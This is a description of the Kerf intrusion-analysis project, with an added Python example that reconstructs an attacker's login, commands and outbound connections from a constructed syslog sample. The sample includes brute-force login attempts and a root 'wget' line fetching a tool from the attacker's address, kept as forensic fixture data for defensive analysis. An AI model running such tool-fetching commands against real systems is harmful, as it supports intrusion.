The objective of the Kerf project is to provide administrators with new methods for analyzing an attack on their computer system. Numerous intrusion-detection tools exist; our focus is on intrusion analysis, specifically on tools that help administrators examine large amounts of host and network log data. The Kerf tools fit into the largely unexplored territory between current approaches that search log data without providing much context and those that report only summary statistics about the records within the logs.
Given that an intrusion has been detected, the Kerf tools help the administrator answer basic questions about the attack: How, when, and where did the intruder get in? What did the intruder do here? Where did the intruder come from? Did the intruder attack remote machines using my system? Answering these questions allows the administrator to close security holes, determine the damage, and collect evidence that may lead to the discovery and capture of the intruder.
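To make the distinction between a context-free log search and a summary-statistics report concrete, here is an added example (not Kerf's own code, which this page does not show) of the kind of hypothesis-driven pivot the questions above call for. Starting from one hypothesis, "this source address is the intruder", it walks a host log once and gathers the entry point and the failed guesses that preceded it (how, when, where), the commands run inside that login session (what was done here), and the connections the host then opened to other machines (was my system used to attack others). The syslog lines, the sshd and sudo message formats, the "OUT:" firewall prefix, and the session-window heuristic (from the accepted login to the disconnect of the same connection) are all assumptions made for the example, and the sample log is constructed, not real data.

```python
import re
from datetime import datetime

# Constructed sample syslog lines for illustration; they are not real data and
# not output from Kerf. Ordinary sshd and sudo messages plus a hypothetical
# "OUT:" firewall log prefix are assumed as the host log formats.
SAMPLE_LOG = """\
Mar 12 02:14:01 host1 sshd[4012]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar 12 02:14:05 host1 sshd[4012]: Failed password for root from 203.0.113.7 port 51234 ssh2
Mar 12 02:14:09 host1 sshd[4012]: Accepted password for root from 203.0.113.7 port 51234 ssh2
Mar 12 02:15:30 host1 sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/wget http://203.0.113.7/tool
Mar 12 02:16:02 host1 kernel: OUT: SRC=192.0.2.10 DST=198.51.100.5 PROTO=TCP DPT=22
Mar 12 02:16:03 host1 kernel: OUT: SRC=192.0.2.10 DST=198.51.100.6 PROTO=TCP DPT=22
Mar 12 02:40:00 host1 sshd[4012]: Disconnected from 203.0.113.7 port 51234
Mar 12 03:00:00 host1 sshd[5000]: Accepted publickey for alice from 192.0.2.50 port 40000 ssh2
Mar 12 03:05:00 host1 kernel: OUT: SRC=192.0.2.10 DST=192.0.2.53 PROTO=UDP DPT=53
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) (?P<prog>[^:\[]+)(?:\[\d+\])?: (?P<msg>.*)$")
AUTH_RE = re.compile(r"^(?P<result>Accepted|Failed) (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port (?P<port>\d+)")
DISC_RE = re.compile(r"^Disconnected from (?P<src>\S+) port (?P<port>\d+)")
SUDO_RE = re.compile(r"^(?P<user>\S+) : .*COMMAND=(?P<cmd>.*)$")
OUT_RE = re.compile(r"^OUT: SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) DPT=(?P<dpt>\d+)")


def parse(log_text):
    """Split syslog text into time-ordered event dicts; lines that do not fit the
    expected shape are skipped rather than guessed at."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        events.append({
            # syslog carries no year; strptime defaults to 1900, which is fine for ordering
            "ts": datetime.strptime(m["ts"], "%b %d %H:%M:%S"),
            "host": m["host"], "prog": m["prog"], "msg": m["msg"].strip(), "raw": line,
        })
    events.sort(key=lambda e: e["ts"])
    return events


def investigate(events, suspect_src):
    """Hypothesis: suspect_src is the intruder. Pivot from that address through
    the log to collect the context behind the questions in the text: how, when
    and where they got in, what they did, and whether this host was then used
    to reach others. Returns None if the hypothesis finds no entry point."""
    entry, failed_before = None, 0
    for e in events:
        m = AUTH_RE.match(e["msg"])
        if not m or m["src"] != suspect_src:
            continue
        if m["result"] == "Failed":
            failed_before += 1          # guesses before the one that worked
        else:
            entry = {"ts": e["ts"], "host": e["host"], "user": m["user"],
                     "method": m["method"], "port": m["port"]}
            break
    if entry is None:
        return None

    # Session window (assumed heuristic): from the accepted login to the
    # disconnect of that same connection (same source address and port),
    # or to the end of the log if no disconnect was recorded.
    end = None
    for e in events:
        d = DISC_RE.match(e["msg"])
        if (d and e["host"] == entry["host"] and e["ts"] >= entry["ts"]
                and d["src"] == suspect_src and d["port"] == entry["port"]):
            end = e["ts"]
            break

    def in_window(e):
        return (e["host"] == entry["host"] and e["ts"] >= entry["ts"]
                and (end is None or e["ts"] <= end))

    commands, outbound = [], []
    for e in filter(in_window, events):
        s = SUDO_RE.match(e["msg"])
        if s and s["user"] == entry["user"]:
            commands.append(s["cmd"])               # what the intruder did here
        o = OUT_RE.match(e["msg"])
        if o:
            outbound.append((o["dst"], o["dpt"]))  # machines reached from this host

    return {"source": suspect_src, "entry": entry,
            "failed_attempts_before_entry": failed_before,
            "session_end": end, "commands": commands, "outbound": outbound}


if __name__ == "__main__":
    result = investigate(parse(SAMPLE_LOG), "203.0.113.7")
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run against the sample log with the hypothesis "203.0.113.7 is the intruder", this reports a root login by password at 02:14:09 after two failed guesses, one command fetching a tool from the same address, and two outbound SSH connections to other hosts during the session; the later DNS lookup at 03:05 falls outside that session and is not attributed to the intruder. Testing the same log against "192.0.2.50" instead yields a different, legitimate-looking picture, which is the point: the context returned is a function of the hypothesis, not of a keyword match.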
Specifically, the aim of the Kerf project is to build semi-automated tools that allow computer experts and system administrators to: (1) identify the characteristics of an attack given data from network sensors, (2) develop a hypothesis about the nature and origin of the attack, (3) have the tools automatically refine and extrapolate that hypothesis, (4) share that hypothesis with security managers at other sites, (5) test that hypothesis at those other sites and coordinate the results of the testing, and (6) archive the data necessary for use as evidence in later law-enforcement actions.